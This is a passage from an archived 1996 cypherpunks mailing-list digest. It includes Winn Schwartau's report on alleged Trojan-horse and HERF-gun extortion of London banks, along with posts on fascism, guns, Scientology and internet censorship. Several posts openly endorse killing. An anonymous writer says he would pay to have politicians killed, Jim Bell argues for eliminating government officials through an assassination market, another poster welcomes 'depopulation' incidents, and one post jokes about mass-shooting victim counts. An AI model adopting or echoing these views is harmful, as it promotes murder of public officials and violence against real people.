According to my British friends, the Sunday Times is preparing even more on this 
story which will appear next Sunday -  when I will be in London to get it back 
to you within minutes.

So, the kids are fine.
"Thanks for asking."
My life is almost relaxed, and we are now headed into the Alps for a leisurely 8 
hr drive and will spend the night at the Jungfrau. 
"Damn, it's raining.  It will have to be beer and sauerkraut."

In the meantime, contact betty@infowar.com  at  Interpact for comments and 
interviews.

Back at your later!

Winn Schwartau




Peace
Winn

		        Winn Schwartau - Interpact, Inc.
		        Information Warfare and InfoSec
		       V: 813.393.6600 / F: 813.393.6361
			    Winn@InfoWar.Com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winn@Infowar.Com
Date: Mon, 10 Jun 1996 09:10:27 +0800
To: rgellman@cais.cais.com
Subject: No Subject
Message-ID: <199606091954.PAA25299@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain



Class III InfoWar              Part 2                 Report from Europe

FEEL FREE TO DISTRIBUTE WIDELY


I am ostensibly  on vacation with my wife and two children ages 11 & 5 :

Here we are in Venice, Italy  but I can't ignore what seems to be going on in 
England. American media does not appear to be  following it.  So  here 's  what 
is happening.

Headline of  June 9, 1996  Sunday  Times in London reads:

"Secret Inquiry into Cyber Terror."

This is a follow-up of last Sundays story about alleged extortion attacks 
against British financial institutions using Trojan Horses and /or HERF Guns.

According to today's article, the British government  is holding  secret 
investigations into the "attacks" for more than two years involving the Dept. of 
Trade and Industry  (DTI), government communications headquarters (GCHQ),  the 
Brits NSA, The Defence Research Agency (DRA), and the Bank of England.

On June 8, the DTI issued a public statement which included : "We are very 
interested in the allegations of extortion directed at City of London 
institutions which were brought to our attention in 1994.  We responded then by 
involving many government organizations ... so far we have not been presented 
with any hard evidence from victims.  We would urge those threatened to come 
forward."

DTI Director of Technical Affairs, David Hendon wrote a letter in May 1995 
saying they took the extortion issue "Extremely seriously."  The Times' 
reporter's say they have seen some of the evidence that was submitted to DTI and 
GCHQ which includes  a chart on 46 of the attacks. According to the article DRA 
Senior  Director,  Professor David Parks, his agency is  " especially interested 
in the "weaponry" deployed by the cyber terrorists."

The Tmes continued  : "The agency (DRA) believes high intensity radio frequency 
"HIRF" guns may have been used to black out trading positions in City finance 
houses. The weapon disables a computer by firing elctromagnetic radiation at it 
and is  a "Black Programme" at the Defence Ministry, one of the highest security 
classification levels."

In Dec. Of 1995, the DRA and Parks approached a company who specializes in 
information warfare and asked them to "arrange a demonstration of a portable 
HIRF weapon in Germany."

The article further states that details on the HIRF systems and their use in the 
City of London have been compiled by a British computer magazine and are being 
passed onto government officials.

*****

I have spoken to more than fifty media in the last week about this story: The 
comments range from "suspicious" of the British reports, "sounds psy -fi", 
"alarming", "scary" and the like.  Even though I am on vacation (Ha!)  I called 
a few of my expert friends for a sanity check and here is what we have to  say.

* The alleged software attacks mentioned in last weeks article are more likely 
the weapon than HERF/HIRF attacks that todays' article focuses  on.  
 
* "Given the kind of systems they use and their connectivity, I can figure a 
hundred ways to do what the article say" one of my experts stated.
 
* As for the HERF/HIRF  we have worked out a number of models for a number for  
the attacks scenarios mentioned, but we have a targeting problem. A free-space  
(air) based attacked would create a wide dispersion pattern and likely have 
effected other organizations  not just those specifically under attack.

* A ground plane attack might cause the alleged results but requires more 
physical access to the facility.
 
 A few thoughts of the potential motivations:  
 
* Were the alleged attacks meant as a malicious Denial of Service (DNS)  attack 
or as a profit scheme?
* Were trading volumes and the stock prices of the alleged victims effected 
during the times in question?
* Was internal profit taking an ulterior motive ?
* I have to keep in mind if we give these stories credence, that over 50% of 
computer crimes involve insiders.

According to my British friends, the Sunday Times is preparing even more on this 
story which will appear next Sunday -  when I will be in London to get it back 
to you within minutes.

So, the kids are fine.
"Thanks for asking."
My life is almost relaxed, and we are now headed into the Alps for a leisurely 8 
hr drive and will spend the night at the Jungfrau. 
"Damn, it's raining.  It will have to be beer and sauerkraut."

In the meantime, contact betty@infowar.com  at  Interpact for comments and 
interviews.

Back at your later!

Winn Schwartau




Peace
Winn

		        Winn Schwartau - Interpact, Inc.
		        Information Warfare and InfoSec
		       V: 813.393.6600 / F: 813.393.6361
			    Winn@InfoWar.Com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 10 Jun 1996 09:51:14 +0800
To: Be Good <qut@netcom.com>
Subject: Re: Thank you for the Archives 100 messages
In-Reply-To: <199606091911.MAA27107@netcom22.netcom.com>
Message-ID: <Pine.SUN.3.93.960609164637.26097A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 9 Jun 1996, Be Good wrote:
 
> > There's a tradeoff between freedom and visibility. As astute readers are
> > aware, hks.net had to take down the archives after WSJ made a threat that
> > was a little too credible.
> 
> Never noticed it.  You folks are just so damned paranoid.
> The government's not out to get you, just help you.


Bahahahah! - Ok, that's clear, now go away.
 
> -- 
> 
> Kill Your Television

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Mon, 10 Jun 1996 14:07:32 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <u7c0oD84w165w@bwalk.dm.com>
Message-ID: <Pine.3.89.9606091735.A9700-0100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 9 Jun 1996, Dr.Dimitri Vulis KOTM wrote:

> I think it would take very few 'depopulation' incidents to improve manners.
> Humans, like rats, are very good at learning from others' mistakes.
> 

A brief survey of history reveals that humans are more anxious to repeat 
the mistakes of their peers and forebearers than to learn from them. It's 
not that they don't learn, but fail to pass the wisdom on to their 
progeny. Not to mention that the average retention span is quite low.

Or you could exhume the old argument that stupid people shouldn't breed. :-)

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 10 Jun 1996 13:43:56 +0800
To: cypherpunks@toad.com
Subject: [NOISE] "Fascism is corporatism"
Message-ID: <199606100023.RAA25303@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:44 AM 6/9/96 -0700, Rich Graves wrote:
[A whole bunch of totally irrelevant boring distractions, amongst them]:
> The Encyclopedia Brittanica says of Mussolini:
>
>  He read widely and voraciously, if not deeply, plunging into the
>  philosophers and theorists Immanuel Kant and Benedict de Spinoza, Peter
>  Kropotkin and Friedrich Nietzsche, G.W.F. Hegel, Karl Kautsky, and Georges
>  Sorel, picking out what appealed to him and discarding the rest, forming no
>  coherent political philosophy of his own

To argue that fascism has no philosophy without mentioning Maurice Barres is
nearly as silly as arguing that communism has no philosophy without mentioning
Marx.  If you delete all reference to Fascist philosophers, you will of course
come to the conclusion that fascism has no coherent philosophy.

Fascism got its epistemology from Barres, and its economic theory from Sorel.

Your argument is analogous to someone who argues that communism had no coherent 
philosophy by talking about Mao as if he had popped out of nowhere, and failing 
to mention Marx and Lenin.

In my opinion the most coherent fascist 
philosopher that preceded the fascist rise to power was Maurice Barres. 
(Of course once fascism was on the rise, you got a bunch more fascist 
philosophers, most of them way to the left of Barres.) This thread in 
philosophy has continued to the present day, though it was abruptly 
renamed after the defeat of Hitler.  Barres's arguments are logically 
and philosophically coherent, and are clearly and unambiguously 
recognizable as the epistemology, and much of the claptrap and rhetoric 
of fascism, and as the epistemology, and much of the claptrap and rhetoric 
of modern PC, and we can trace the philosophical thread connecting modern 
PC to Barres through known Nazi philosophers who not merely philosophized, 
but also participated actively in Hitler's regime, and to direct and 
immediate disciples of those philosophers, such as Derrida.

> > Many of my readers will think I am excessively harsh, calling Rich
> > Graves a liar rather than a fool, but I hear the above story 
> > (that fascism is not a coherent ideology or philosophy) primarily from
> > those whose interests this story serves, and if they genuinely 
> > thought this story was true, they would not know that it is in their
> > interests to push it.

> Huh? In English, please.

Perhaps I was elliptical in the above.  I will restate:

The claim that fascism lacks an economic program and/or a philosophy comes 
primarily from those whose economic program and/or philosophy bears a
marked resemblance to fascism.   If they were not aware of this resemblance
they would not so vigorously seek to redefine fascism as military dictatorship, 
racism, etc.

This leads me to doubt the basic human honesty of those who push this line,
and their concern for human lives.

> Anyway, I never suggested that there was no such thing as fascist
> philosophy; just that fascism was not rooted in a well-developed ECONOMIC
> ideology, 

Revisionism alert:  

I just deleted vast chunks of text from your message above 
where you presented negative evidence that fascism had no 
philosophy, and I was just thinking that maybe I had overdone it 
and would get flamed for deleting arguments rather than answering them.

> and that Tim's definition of corporatism is incorrect both in the
> abstract and in the cases of Italian fascism and Nazism.

Revisionism alert:

Tim gave a perfectly correct definition of corporatism, and you then
proceeded to give a very similar definition, and you then proceeded 
to smear Tim by falsely implying that he gave a silly ignorant 
definition, radically different to the one he did in fact give.

You also have carefully avoided mentioning Sorel, who of course advocated 
roughly the economic problem that Mussolini attempted to implement, that
Hitler did implement, and that Timothy May condemned, long before Mussolini
got of the ground.  Sure sounds like an economic ideology to me.

> > Not only do such concepts as feminist science, phallocentric science, 
> > etc, strongly resemble such concepts as aryan science, jewish science, 
> > etc, but they are justified using the same arguments from the same 
> > philosophers.  Indeed Heidegger was not only a philosopher of fascism, 
> > but he personally participated in Hitler's terror, terrorizing his academic
> > colleagues, and Paul De Man of Yale University worked directly for the 
> > Nazis as a propagandist in occupied Belgium.

> Here James demonstrates his absolute mastery of the subject.
>
> Heidegger only really supported Nazism from 1933-34; in the 40's and
> thereafter, he referred to Nazism as a disease. 

Yeah, right, And the only fifty thousand jews were murdered.  :-)

Historical Revisionism alert:  

The above is wildly implausible:  You do not call Nazism a disease 
in Nazi Germany and live to tell of it, let alone call Nazism a 
disease and get appointed to the important and well paid job of 
terrorizing your academic colleagues.

The above is also infamously false:  As rector, Heidegger denounced 
those of his colleagues he wished murdered as jews, including his 
own teacher, and he organized paramilitary camps for his students, 
spouting martial rhetoric about the "inner truth and greatness of 
National Socialism," see citation below.

> He is remembered as an
> existentialist, not a Nazi, 

Historical Revisionism alert:  

See http://www.inlink.com/~dhchase/heidig.htm for how he is REALLY 
remembered.

Heidegger himself claimed at the time, his political activities grew 
out of his philosophy, and this claim seems to me to be very obviously true.

Indeed what he claimed then is equivalent to what I have been telling you in
public and private email:  That your ideas lead to people being murdered by
the state, and therefore you should consider them more carefully.

> though he did join the party when he became the
> rector of Freiburg. 

Historical revisionism alert:

His most infamous work was his laudatory speech on Hitler given when 
he was appointed rector of Freiburg.  In addition he never disowned 
his works on the "jewish problem".  As rector he imposed Nazism on 
his colleagues by the usual means.

> The fact that Paul de Man, in his early years in Nazi-occupied Belgium,
> wrote antisemitic propaganda for a number of local collaborationist journals
> was not discovered until four years after his death (by Ortwin de Graef). 

The fact that Paul de Man's philosophy had a very strong resemblance to 
fascist philosophy was discovered considerably earlier.  The fact that he 
also wrote the kinds of racist propaganda that are no longer politically 
correct was merely the icing on the cake.

> By the way, I voted for Bush, and no matter how many times you contradict
> me, I know I don't support the government's actions at Ruby Ridge. 

Revisionism alert (or perhaps in this case merely a reinterpretation alert):

In previous mail you claimed it was not a government action, it was just
a few FBI guys running amuck entirely on their own initiative.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 10 Jun 1996 10:22:48 +0800
To: cypherpunks@toad.com
Subject: Re: Whalepunks, Marginpunks, Gunpunks, Clintonpunks, and Politics
Message-ID: <2.2.32.19960609213222.00b3e650@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:09 PM 6/8/96 -0700, Timothy C. May wrote:

>First, a Smith and Wesson is not what the tots should be carrying. An MP-5K
>would fit nicely in their bookpacks (especially now that all yuppie kids
>carry de rigeur designer backpacks, though mostly for designer water). More
>firepower.

>My point of view is that while schools should be free of guns, adult
>citizens should probably have access to guns. There are, sadly, nutty
>people who will use nearly any available weapon to commit mayhem and mass
>murder. Rifles, shotguns, axes, knives...

And to bring things back somewhat to cypherpunk (or at least
technopunk)issues, weapons control (like other forms of regulation) is
defeated by technology.  Last week's Economist had an article on the first
commercially available 3D "printers" or desktop fabrication stations.  A bit
hard to control weapons when one can just print off a few.  In addition
other technical advances are bound to put a host of weapons in everyone's
hands.  You can't disarm a technically advanced population.  Too many tools
can be adapted to kill.  

This being the case, you should allow your society to adapt to this reality
by getting people used to the concept of self defense, small group defense,
and behaving oneself in public.  

>Remember, "Guns don't kill people, postal workers do."

In fact, in 1995 the term to go "postal" entered the vocabulary.  As in the
sentence "LD went postal and wiped out the whole ballet class."  

Another Cypherpunks angle lies in the fact that fans of "going postal" have
also noted that 14 is a Schelling point for the number of victims of one of
these massacres.  I wonder why that is?  Magazine size?

>In general, I think Phill raises some good points about the efficiency of
>free markets. However, I doubt that Cypherpunks is the proper forum for
>debating economic theory, for various reasons. I lean strongly toward the
>free market side, inasmuch as I think most non-free market economies are
>actually just cases where the government controls the _single_ corporation
>they let run an industry, and thus one gets a worse situation that with the
>grossest excesses of capitalism.

I always ask the commies how they can guarantee that political complications
won't interfere with the perfect implementations of their no doubt superior
five year plans.  I can guarantee that the commissar's brother-in-law will
go bankrupt (if he deserves to) under capitalism.  How can they guarantee
that under socialism?

>However, the reason many of us don't jump in and write defenses of free
>markets here (and I would not have except to make my transhumanist joke--so
>sue me) is that this list is not "Libernet" nor any of the similar
>political discussion lists. 

Also it's not necessary since markets can take care of themselves these
days.  "History is on our side."  "We will bury you."  "The Multinational
unites the human race."  "Di-electrical materialism dooms both the ancien
regime and state capitalism." etc.

DCF

"A free market is what you get when people are free."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 10 Jun 1996 10:58:23 +0800
To: cypherpunks@toad.com
Subject: Re: US: Domestic Encryption Protected by US Constitution?
Message-ID: <2.2.32.19960609214558.00b44844@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:36 PM 6/8/96 -0700, Timothy C. May wrote:

>I don't think we want crypto controlled by the Bureau of Alcohol, Tobacco,
>and Firearms, do we?

That'd be the BATFC.  To be called "bat fuck" in the popular press (but not
on the post-CDA Net).

DCF

"If you have a job opening in a cool climate for an experienced technical
author  with a solid understanding of cryptography, write to me."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 10 Jun 1996 13:23:48 +0800
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: Anonymous stock trades.
Message-ID: <199606100051.RAA27475@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 1:15 AM -0400 6/9/96, jamesd@echeque.com wrote:
>> Brand [the whales] and herd them like open range cattle:  The west did not
>> need a government to do that, though they did need to hang a few
>> folk who favored a different method of open ranging.

At 09:02 AM 6/9/96 -0400, Robert Hettinga wrote:
> Ah. Transponders. Could blind-sign 'em. Maritime specific-identity
> accounting. Trade 'em on the open market. Actual anonymous er, stock,
> ownership? Whale-meat futures on the hoof, er, fin?

Thanks for this clarification:  I fear my post had a lot of people thinking
of whalers sitting around a sagebrush campfire heating extremely large irons 
red hot.  Really large irons.

Really, really, really large irons.  And a really big sagebrush campfire.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 10 Jun 1996 03:20:47 +0800
To: cypherpunks@toad.com
Subject: Re: FOR WHOM THE BELL TOLLS
Message-ID: <199606091601.SAA14792@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Bryce wrote (whilst on his high horse):

> Hm.  I think the best we could hope for is along the lines of
> "The suspect subscribed to the 'Cypherpunks' discussion group on
> the Internet, but his violent views were rejected by the members
> of the group."

Not every member of this list rejects his views.  I for one do not
reject them outright, but will not defend his views publically for
fear of embarassing the corporation that I work for. I do not
reject Jim Bell's violent views for the simple reason that violence
is often required to fight violence.  In other words, the best you
can hope for is "... but his violent views were rejected by some
members of the group."

> It is important that the reporter manages to _not_ use the word
> "member" to indicate that Bell is a "member" of Cypherpunks.

He *is* a member. And why shouldn't he be?  Are you suggesting that
this group become moderated? (hiss).  The whole AP concept is very
relevent to the Cypherpunks, whether the majority like it or not.

> I think that conversing with Bell, or publically replying to him
> at all, even to insult him, makes him more of a "member" and
> makes his pet topic more a part of cypherpunks, both in appearance
> and in substance.  So don't do it.  That means you, too,
> Black Unicorn.  At _least_ you can take it to private e-mail in
> order to prevent the reporters from getting the wrong idea, and
> in order to spare the rest of us the tedium of deleting the
> messages.

No platform for lunatics???  If there is one thing that a Cypherpunk
should have learned during his time in the group, is that the answer
to hate speech (or violent speech, or whatever you wish to call it)
is more speech.

If your fear is that reporters will get hold of the wrong end of the
stick, then perhaps you are correct, but the real problem is the
*reporters*, not the attitude of the Cypherpunks.  blame them.
propose a solution. (how about abolition of all libel laws?)

> This is assuming that the statement "his violent views were
> rejected by the members of the group" is actually true!  If
> there _is_ anyone else here who shares Bell's evil enthusiasms,
> I strongly encourage you to begin a new list dedicated to that
> topic.

I disagree with the phrase "evil enthusiasms."  Bell is not an
evil man.  A little crazy perhaps, but not evil.  If you bothered
to listen to him, you would find that his aim is to create a
"better" world, where people (especially politicians) are very
much more responsible for their own actions.  He suggests that
the number of deaths due to AP will be less that the number of
deaths due to the current corrupt system.

think about it.  how many on this group would have another man
killed for his views?  For his noisy stereo?  For a competive
advantage in business?  I am confident the answer will be zero.

On the other hand, I would gladly throw in a few dollars to have
certain politicians killed.  gladly.  and I will be able to sleep
at night.  I will sleep better knowing that, although I was
partly responsible for a mans death, I will have saved countless
others (a bit like dropping an a-bomb on Japan).


Question for Jim - would you resort to AP to have Bryce popped off?
Question for Bryce - would you resort to AP to have Jim popped off?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Mon, 10 Jun 1996 14:36:18 +0800
To: cypherpunks@toad.com
Subject: Re: Anti-Scientologists
Message-ID: <199606100121.SAA29907@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:13 PM 6/9/96 +0200, Anonymous wrote:
>Truth #1: It is a religion
>Truth #2: It is no longer a cult, since the leader is dead.

Truth number 3:  It charges fifty thousand dollars or so for
secrets of "religous technology" that are available free of charge
on the internet.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 10 Jun 1996 14:25:18 +0800
To: cypherpunks@toad.com
Subject: Netly News on Info War
In-Reply-To: <199606091954.PAA25299@mailhost.IntNet.net>
Message-ID: <Pine.GUL.3.93.960609182437.10009B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Pathfinder's ever-cheesy Netly News, www.netlynews.com, carried a story June
5th called "InfoWar is Hell" reacting to the Sunday Times cyberterror
report.  http://pathfinder.com/@@V1G2VgUAwN2g0jLY/Netly/daily/960605.html
Pretty good story IMO. 

June 7th story was on the rec.music.white-powder troll. People who actually
bothered to look at news.groups will be pleased to see the laurels heaped on
the votetaker, but displeased that my attempts to get the reporter to POINT
PEOPLE TO NEWS.GROUPS were unsuccessful. URL 
http://pathfinder.com/@@V1G2VgUAwN2g0jLY/Netly/daily/960607.html

If for whatever reason you want the 3MB raw results, I have a copy at
http://www.stanford.edu/~llurch/potw2/rec.music.white-powder that's probably
easier to get to than ftp.uu.net.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 10 Jun 1996 16:10:10 +0800
To: cypherpunks@toad.com
Subject: Obscenity checkpoints
Message-ID: <199606100153.SAA28565@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The Maryville-Alcoa (TN) Daily Times, June 3, 1996.

`Calvin' Decals Catching Some Heat

Auto displays may be deemed `obscene'

By Justin Cress

Tennessee motorists might need to be more discriminating in the
future about the statement their automobiles are making.

A recent warning issued to a South Carolina woman for displaying
an "obscene" bumper sticker has caused some controversy about
that state's obscenity laws.

Decals portraying Calvin, of Bill Waterson's popular "Calvin and
Hobbes" comic strip, urinating on assorted objects of ridicule
are sweeping the Southeast.  The decals' increased visibility
prompts the question:  Is it obscentity or simply bad taste?

Patti Redden of McConnells, S.C., was surprised to find, while
being stopped at a highway patrol checkpoint, that the
reproduction displayed in her rear window was considered
offensive and illegal according to state ordinances.  Her version
depicted the letters "IRS" receiving the Calvinesque treatment.

Like South Carolina, Tennessee's obscenity laws prohibit the use
of "patently offensive" stickers, window-signs, or other markings
on a motor vehicle.  An opinion handed down in 1989 by the state
defines patently offensive as "that which goes substantially
beyond customary limits of candor in describing or representing
such matters," especially when pertaining to excretory functions.

Sharon Curtis-Flair, public information officer of the Tennessee
Attorney General's Office, expects to see renewed interest in the
state's laws.

"We went through this before in 1988 with (another questionable
bumper sticker)," said Curtis-Flair.  "The law has really not
been tested yet.  It's just never been challenged."  (...)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 10 Jun 1996 04:34:18 +0800
To: cypherpunks@toad.com
Subject: Re: Anti-Scientologists
Message-ID: <199606091713.TAA18786@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
> 
> >1. There's a gang of flamers (David Gerard, Jon Noring, Ron Newman, Rob J.
> >Nauta, and the like) who try to stop $cientologists from discussing their
> >religion on the Usenet newsgroup alt.religion.scientology. Most of them are
> >disgruntled former cult members and/or members of other similar cults.
> 
> Untruth #1. Aside from the "religion" red herring you tossed in (it's a cult), the critics expose the lies, doubletalk and inconsistencies posted by cult apolo

Truth #1: It is a religion
Truth #2: It is no longer a cult, since the leader is dead.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 10 Jun 1996 15:28:50 +0800
To: cypherpunks@toad.com
Subject: Gore's speech writers
Message-ID: <ade0d4f70b021004dfaf@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:02 AM 6/10/96, Joseph M. Reagle Jr. wrote:
>        Sounds good but I had to laugh when I heard it... is he at odds with
>other members of the administration, or is this rhetoric?
>
[Gore speech elided]

You want a serious answer?

"Speech writers."

Guys at the level of Gore rarely compose their own thoughts. They depend
almost wholly on speech writers. William Safire, Patrick Buchanan, etc. (I
don't follow Clinton and Gore, so I don't know who their speech writers
are.)

I read an interesting op-ed piece about how wonderful Bob Dole's
resignation-from-the-Senate speech was, about how resonant and thoughtful
it was. But the piece went on to point out that the speech was
"un-Dole-like." Turns out it was written by Mark Helprin, a former WSJ
writer and current novelist. Dole is just a typical politician.

Gore is also just a typical politician. To an MIT or CMU crowd he'll give a
speech about the importance of free speech. To a San Francisco crowd he'll
give a speech about the need to create methods of self-policing of hate
speech and limits on speech critical of gays. To a graduating class at "The
Farm" he'll give a speech about the reasons the CIA and NSA must wiretap
all communications. To his St. Alban's 30th Reunion buddies he'll reminisce
about how much fun it was to sit there on Dad's lawn overlooking the
Potomac smoking dope. To the Drug Enforcement Administration he'll give a
pep talk on how DARE is successfully getting more and more children to narc
out their parents.

And so it goes. Politicians say what they think their audience wants to hear.

--Tim May



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 10 Jun 1996 15:11:59 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Re: Anonymous computer contractors
Message-ID: <199606100240.TAA25079@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:24 PM 6/9/96 -0500, Igor Chudov @ home wrote:
>Dr.Dimitri Vulis KOTM wrote:
>[we were discussing jimbell's assassination clearinghouse - Igor]
>
>> > Maybe your hint really makes sense and after initial depopulation the
>> > citizens will use different, more considerate, ways of dealing with each
>> > other.
>> 
>> I think it would take very few 'depopulation' incidents to improve manners.
>> Humans, like rats, are very good at learning from others' mistakes.
>
>Alright, but since quite a few people have quite a few present enemies,
>the depopulation may be severe enough.

I disagree.  While each of us may arguably have a number of enemies, if our 
lists were compared I think most of those enemies can be located in a 
relatively tiny group of people, most of whom exercise government authority. 
 Eliminate them, and a relatively small number of criminals, and it'll be a 
rather safe and pleasant society.


> The only hope is that the assassin market will become tight.

I think that the _need_ will drop long before the supply of potential 
assassins will.  Resignations will occur, and criminals will straighten up quickly.




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 10 Jun 1996 16:05:38 +0800
To: cypherpunks@toad.com
Subject: Fight-Censorship Dispatch #13: The Second Great Net Panic
Message-ID: <oliq7Pe00YUy8X6p4_@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain




-----------------------------------------------------------------------------
                     Fight-Censorship Dispatch #13
-----------------------------------------------------------------------------
                      The Second Great Net Panic
-----------------------------------------------------------------------------
         By Declan McCullagh / declan@well.com / Redistribute freely
-----------------------------------------------------------------------------

In this dispatch: The Second Great Net Panic grips Washington, DC
                  Bruce Taylor tries a "finger" gambit
                  DFC online copyright action alert, press conference
                  Deputy Atty General slams Net, calls for central control
                  Al Gore decries "unwarranted censorship?"


June 9, 1996

WASHINGTON, DC -- As a wet spring steams into a muggy summer, the
Second Great Net Panic has gripped the nation's capital. 

It could be the humidity. The same waterlogged air that makes my
keyboard stick about this time every year forces lobbyists and
legislators indoors to catered receptions and air-conditioned 
hearing rooms where they catalog the dangers of the Net. Or perhaps
election year politics lends this scaremongering rhetoric its
rough, serrated edge. 

Whatever the cause, it's clear that last year's cyberporn scare --
centering around online smut and leading to the passage of the
Communications Decency Act -- is dwarfed by this year's fevered
attempts to control the Net.

That is, you ain't seen nothin' yet. 

In the last two weeks:

  * The Federal Trade Commission held two days of hearings to decide
    how to regulate web sites that collect personal information about
    children.
  * Sen. Sam Nunn (D-GA) announced at a Senate investigations
    subcommittee hearing that his suspicions of evil cryptohackers
    lurking on the Net mean the CIA and NSA must be permitted to
    snoop domestically, a practice long prohibited by law.
  * The Clinton administration responded to Congressional attempts to
    liberalize export controls on strong encryption with a "Clipper
    III" white paper, and a blue-ribbon NRC report recommended only
    minor changes in U.S. crypto export policy.
  * The Senate Judiciary Committee held hearings where witnesses from
    the Hollywood copyright lobby testified that copyright thieves
    plague the Net.
  * A House Judiciary subcommittee is planning a final markup of
    HR2441, a terribly restrictive online copyright bill similar to
    one the Senate is considering, this Wednesday.
  * The Defense Information Systems Agency released a report claiming
    that hackers tried to break into Pentagon systems 250,000 times in
    1995.
  * The 1997 Defense Authorization Bill will give the White House six
    months to report on "the national policy on protecting the
    national information infrastructure from strategic attack."
  * At the first-ever "CyberCongress" hearing held by a House
    committee, representatives complained about being flamed through
    anonymous remailers and said there should be accountability online.
  * Today's Sunday Washington Post featured an article by Richard Leiby
    on the first page of the Outlook section bashing "self-indulgent
    dross" and "crap" on the Net: "I took out the Internet trash
    and found there wasn't much left."
  * Sen. Orrin Hatch (R-UT), chair of Senate Judiciary, held a hearing
    on June 4 where family values activists testified in support of
    Hatch's bill that gives you 15 years for creating or viewing a
    GIF that "appears to be" or is said to be kiddie porn -- even if
    it's actually a morphed photo of an adult.
  * Journalist Lew Koch unearthed an alarmist speech by Deputy
    Attorney General Jamie Gorelick slamming not just nonescrowed
    crypto but the "social problems" of the Net -- and calling for a
    new "Manhattan Project" and even a new Federal agency to start
    "devising and implementing solutions."

That's the bad news, and the good news is far from reassuring. Some
Congressperns are starting to learn about the Net and the Internet
Caucus' membership is growing. The computer industry has begun to
become more involved in the legislative process, but they're up
against well-entrenched opposition.

The EFF's Mike Godwin had it right when he wrote to me earlier today:
"Every agency wants a bite of jurisdiction over the Internet."

I'm not placing any bets on the eventual outcome of the Second Great
Net Panic, especially when protect-our-children rhetoric comes laced
with protect-our-country slogans. But I know the summer's starting and
some of the keys on my workstation are starting to stick. Yesterday I
spent a sweaty afternoon performing open-keyboard surgery to try and
get my home row working again.

So I'm not too optimistic...


+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+
                  BRUCE TAYLOR TRIES A "FINGER" GAMBIT
+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

